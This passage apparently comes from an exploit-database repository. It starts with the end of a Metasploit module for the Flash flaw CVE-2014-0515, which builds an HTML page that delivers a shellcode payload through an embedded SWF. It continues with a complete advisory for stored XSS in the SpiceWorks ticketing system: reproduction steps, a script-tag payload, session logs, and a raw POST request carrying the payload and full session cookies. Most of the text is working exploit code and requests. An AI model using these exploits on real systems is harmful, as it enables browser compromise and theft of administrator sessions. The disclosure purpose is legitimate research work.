profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
flash_payload = ""
get_payload(cli,target_info).unpack("V*").each do |i|
flash_payload << "0x#{i.to_s(16)},"
end
flash_payload.gsub!(/,$/, "")
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=flash_payload%>" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end

103
platforms/windows/webapps/33330.txt Executable file
View file

@ -0,0 +1,103 @@
# Exploit Title: Multiple Stored XSS vulnerabilities in SpiceWorks Ticketing system
# Date: 12/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://spiceworks.com
# Software Link: http://download.spiceworks.com/Spiceworks.exe
# Version: 7.2.00174 (Latest)
# Tested on: Kali Linux
# Vendor alerted: 12/05/2014
1. About the application:
=======================
SpiceWorks is an IT ticketing system deployed in many companies around the world
2. Vulnerability Description:
=========================
Multiple stored XSS were found in SpiceWorks system, allowing an attacker to create a SpiceWorks IT ticket with malicious code.
once an admin attemps to login to the system dashboard to view open tickets, the code executes and the attacker
could potentially steal the admin's cookies.
3. PoC Videos:
===============
https://www.youtube.com/watch?v=lG5Y_okTaos&feature=youtu.be
https://www.youtube.com/watch?v=efIyZRTDS9c
Steps to reproduce:
i. Create a ticket in user_portal with the title <script>alert(document.cookie);</script>
ii. submit.
iii. login as admin user and navigate to the open tickets, the XSS appears.
4. Session Logs:
<-> Vulnerability 1 <->
<div id="helpdesk" class="helpdesk-root">
</div>
<script type="text/javascript">
//<![CDATA[
window.startingEventId = 112;
window.eventGeneration = '3b30b3bfedfae8be30d2b5412fc93003';
window.HelpDesk.on("before:start", function() {
this.options = {
dateFormat: "%m/%d/%y",
timeFormat: "%I:%M %p",
currencySymbol: "$",
allowDelete: true,
categories: ["","Maintenance","End User Support"],
admin: [{"id":1,"first_name":"user","last_name":"far","email":"admin@gmx.com","role":"admin","department":"IT","avatar_path":null,"primary_phone":null,"show_url":"/people/1"},{"id":3,"first_name":"dolev","last_name":"test","email":"attacker@gmail.com","role":"helpdesk_tech","department":null,"avatar_path":null,"primary_phone":null,"show_url":"/people/3"}],
customAttrs: [],
disableShortcuts: '',
data: {
ticketView: {"name":"open_tickets","label":"Open Tickets","sort_by":"id","sort_dir":"desc","hidden_cols":["created_at","closed_at","category","site"],"tickets":[{"id":11,"summary":"\u003Cscript\u003Ealert(document.cookie);\u003C/script\u003E","status":"open"
selectedSite: "all",
remoteSites: [{"name":"Central Server","site_id":1}]
}
};
});
//]]>
</script>
</div>
<-> Vulnerability 2 <->
POST /settings/advanced/save_system_setting?name=pdf_header_color HTTP/1.1
Host: ip.add.re.ss
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.186.31/settings/advanced?more_settings=true
Content-Length: 177
Cookie: user_id=BAgw--XXXX6231342123XXXX234213515; portal_user_email=BAhJIhV1c2VyMTk4N0BnbXguY29tBjoGRVQ%3D--f9cd3afeeb246cb35d3670914c45c30e427b76f7; __utma=1.399722362.1399878889.1399878889.1399878889.1; __utmb=1.107.0.1399879583954; __utmz=1.1399878889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); spiceworks_session=BAh7FToPc2Vzc2lvbl9pZCIlNzgzNzc2ZGNiNTg1ZWQ1ODRlMDVmN2QyNmIwMzc5NWU6EF9jc3JmX3Rva2VuSSIxRkJGMC8vQ2VkYmRzNUtPV05PM2lrK0FQeVAyb25zcHg4WTNPOUdOWU1sWT0GOgZFRkkiCmZsYXNoBjsHRklDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgx1c2VyX2lkaQY6FHVzZXJfZmlyc3RfbmFtZUkiCXVzZXIGOwdUOhN1c2VyX2xhc3RfbmFtZUkiCGZhcgY7B1Q6D3VzZXJfZW1haWxJIhV1c2VyMTk4N0BnbXguY29tBjsHVDoWdXNlcl9jb21wYW55X25hbWVJIg10ZXN0Y29tcAY7B1Q6DnVzZXJfcm9sZUkiCmFkbWluBjsHVDoPY3JlYXRlZF9hdEl1OglUaW1lDYeRHICWg2JpBjoLb2Zmc2V0aQIwKjoNcmVtZW1iZXJGOhhsYXN0X2ZlYXR1cmVfdXBkYXRlSXU7EQ2HkRyAfodiaQY7EmkCMCo6FmZlYXR1cmVfdXNhZ2VfbWFwexlpBlRpCEZpCUZpEEZpE1RpFVRpFlRpGEZpGUZpGkZpG0ZpCkZpC0ZpDEZpD0ZpF0ZpHEZpHUZpDVRpElQ6H3VzZWRfZmVhdHVyZV9lZHVjYXRpb25faWRzWwA6FnBvcnRhbF91c2VyX2VtYWlsQA06HWxhc3Rfc2V0dGluZ3NfY29udHJvbGxlckkiDWFkdmFuY2VkBjsHRg%3D%3D--64198aa54c349fff2e6e7db88fe63d864cec55fe; compatibility_test=testing; __utmc=1; last_view=open_tickets; tickets_per_page=25
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
_pickaxe=%E2%B8%95&value=%3Cscript%3Ealert(%22pdf001%22)%3C%2Fscript%3E&editorId=pdf_header_color_inplace&authenticity_token=FBF0%2F%2FCedbds5KOWNO3ik%2BAPyP2onspx8Y3O9GNYMlY%3D